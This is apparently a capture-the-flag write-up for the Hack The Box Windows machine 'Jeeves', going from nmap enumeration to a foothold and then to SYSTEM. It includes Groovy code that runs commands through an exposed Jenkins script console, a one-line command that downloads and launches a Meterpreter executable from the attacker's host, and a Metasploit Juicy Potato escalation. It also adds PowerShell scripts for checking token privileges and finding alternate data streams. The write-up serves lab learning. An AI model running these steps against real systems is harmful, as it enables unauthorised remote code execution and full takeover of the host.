Jeeves

OS: Windows, Difficulty: Medium, IP: 10.10.10.63

Initial Enumeration

# Nmap 7.70 scan initiated Mon Jul 22 01:27:35 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,135,445,50000 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.34s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10 (88%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1511 - 1607 (85%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h53m14s, deviation: 0s, median: 4h53m14s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-22 06:21:13
|_  start_date: 2019-07-22 06:08:01

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   234.36 ms 10.10.14.1
2   411.09 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 22 01:28:34 2019 -- 1 IP address (1 host up) scanned in 59.36 seconds

SMB on 445: the guest account is disabled and anonymous (null-session) login is refused, so nothing there. Gobuster against port 80 found nothing either, but port 50000 turned up something interesting.

/askjeeves (Status: 302)

The redirect lands on a Jenkins instance. Jenkins ships a Groovy script console, reachable for the master node at:

http://10.10.10.63:50000/askjeeves/computer/(master)/script

Commands pasted straight into the console gave poor output, so I switched to the following Groovy, which captures both stdout and stderr of the spawned process. Replace $COMMAND_GOES_HERE with the command to run (the string is single-quoted, so Groovy does not interpolate it and cmd.exe /c receives it verbatim):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c $COMMAND_GOES_HERE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
The command I substituted for $COMMAND_GOES_HERE (a single line; the \" escapes are for the Groovy string literal) builds wget.ps1 with echo, runs it under PowerShell, and then launches the downloaded binary:

echo $webclient = New-Object System.Net.WebClient >>wget.ps1 & echo $url = \"http://10.10.14.13/shell.exe\" >>wget.ps1 & echo $file = \"shell.exe\" >>wget.ps1 & echo $webclient.DownloadFile($url,$file) >>wget.ps1 & powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 & shell.exe

Running that command writes wget.ps1, which pulls my Meterpreter executable (shell.exe) from my box and launches it; the handler in msfconsole caught a user shell.

User Own

C:\Users\kohsuke\Desktop>type user.txt
type user.txt
e3232***

Root Own

msf5 post(multi/recon/local_exploit_suggester) > run                       

[*] 10.10.10.63 - Collecting local exploits for x64/windows...             
[*] 10.10.10.63 - 11 exploit checks are being tried...                     
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.                                                      
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.                                                
[*] Post module execution completed  
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run                

[*] Started reverse TCP handler on 10.10.14.13:4444                        
[*] Launching notepad to host the exploit...                               
[+] Process 3760 launched.           
[*] Reflectively injecting the exploit DLL into 3760...                    
[*] Injecting exploit into 3760...   
[*] Exploit injected. Injecting exploit configuration into 3760...         
[*] Configuration injected. Executing exploit...                           
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.                                                                   
[*] Sending stage (179779 bytes) to 10.10.10.63                            
[*] Meterpreter session 3 opened (10.10.14.13:4444 -> 10.10.10.63:49686) at 2019-07-22 19:49:54 +0530                                                  

meterpreter > getuid                 
Server username: NT AUTHORITY\SYSTEM 
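Before firing a Potato-family module it is worth confirming the prerequisite: the ms16_075 reflection (Juicy Potato) exploits need SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege in the current token, which is why they succeed from the Jenkins service context here. The check below is an added example, not from the original writeup or from Metasploit; it parses whoami /priv in the shell you got from the script console and reports whether either privilege is present (a Disabled state still counts, since the exploit enables the privilege itself).

```powershell
# Added example, not part of the original writeup: confirm the token prerequisite for
# the ms16_075 / Juicy Potato style local exploits before running them.
function Test-ImpersonationPrivilege {
    # whoami /priv /fo csv yields the columns "Privilege Name", "Description", "State"
    $privs  = whoami /priv /fo csv | ConvertFrom-Csv
    $wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

    # Present-but-Disabled privileges still count: the exploit calls
    # AdjustTokenPrivileges to enable them, it cannot add ones that are absent.
    $held = $privs | Where-Object { $wanted -contains $_.'Privilege Name' }

    [pscustomobject]@{
        User        = (whoami)
        Held        = ($held | ForEach-Object { '{0} ({1})' -f $_.'Privilege Name', $_.State }) -join ', '
        Exploitable = [bool]$held
    }
}

# Usage: run in the low-privileged shell and read the Exploitable column
Test-ImpersonationPrivilege | Format-List
```

If Exploitable comes back False, the suggester's "appears to be vulnerable" verdict for the Potato modules is a false positive for that token and a different path to SYSTEM is needed.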

That gave a SYSTEM shell, but there was no root.txt in the Administrator's Desktop folder where it is supposed to be; instead there was a text file saying the following.

C:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere.  Look deeper.

After three or four hours of digging, listing the directory with dir /R, which shows NTFS alternate data streams alongside each file, revealed where the flag was hidden:

C:\Users\Administrator\Desktop>dir /R
dir /R                               
 Volume in drive C has no label.     
 Volume Serial Number is BE50-B1C9   

 Directory of C:\Users\Administrator\Desktop                               

11/08/2017  10:05 AM    <DIR>          .                                   
11/08/2017  10:05 AM    <DIR>          ..                                  
11/03/2017  10:03 PM               282 desktop.ini                         
12/24/2017  03:51 AM                36 hm.txt                              
                                    34 hm.txt:root.txt:$DATA               
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk     
               3 File(s)          1,115 bytes                              
               2 Dir(s)   7,477,682,176 bytes free                         

C:\Users\Administrator\Desktop>type  hm.txt:root.txt:$DATA                 
type  hm.txt:root.txt:$DATA          
The filename, directory name, or volume label syntax is incorrect.         

C:\Users\Administrator\Desktop>type hm.txt:root.txt                        
type hm.txt:root.txt                 
The filename, directory name, or volume label syntax is incorrect.         

C:\Users\Administrator\Desktop>more < hm.txt:root.txt                      
more < hm.txt:root.txt               
afbc5***
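The two failed type attempts and the working more < line illustrate the catch: cmd.exe's type does not understand the file:stream syntax, while redirection opens hm.txt:root.txt through CreateFile, which does. PowerShell exposes streams directly through its -Stream parameters. The script below is an added example, not part of the original writeup: it walks a directory tree, lists every named stream except the default :$DATA stream and the mark-of-the-web Zone.Identifier stream, and reads each hit back. The starting path is the Administrator desktop from this box; point it at whatever tree you are searching.

```powershell
# Added example, not part of the original writeup: hunt for NTFS alternate data
# streams under a directory and read back whatever is found.

function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)] [string]   $Path,
        [string[]] $Ignore = @('Zone.Identifier')   # downloaded-file marker, usually noise
    )
    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * lists every stream; the unnamed default data stream shows as ':$DATA'
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' -and $Ignore -notcontains $_.Stream } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                    }
                }
        }
}

function Read-AlternateDataStream {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [string] $Stream
    )
    # Get-Content -Stream opens the named stream directly, no redirection trick needed
    Get-Content -LiteralPath $Path -Stream $Stream -Raw
}

# Usage on this box (path assumed from the writeup; change it for another target)
$hits = Find-AlternateDataStream -Path 'C:\Users\Administrator\Desktop'
$hits | Format-Table -AutoSize
foreach ($h in $hits) {
    '{0}:{1} -> {2}' -f $h.File, $h.Stream, (Read-AlternateDataStream -Path $h.File -Stream $h.Stream)
}
```

Run it with -Path C:\Users to sweep every profile at once; the -Force switch makes sure hidden and system files are included, which is the other place flags and credentials get tucked away.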

Learning Outcome

Always enumerate NTFS alternate data streams (dir /R, or Get-Item -Stream * in PowerShell) as well as hidden files: a file can carry extra named streams that a plain directory listing and type never show.
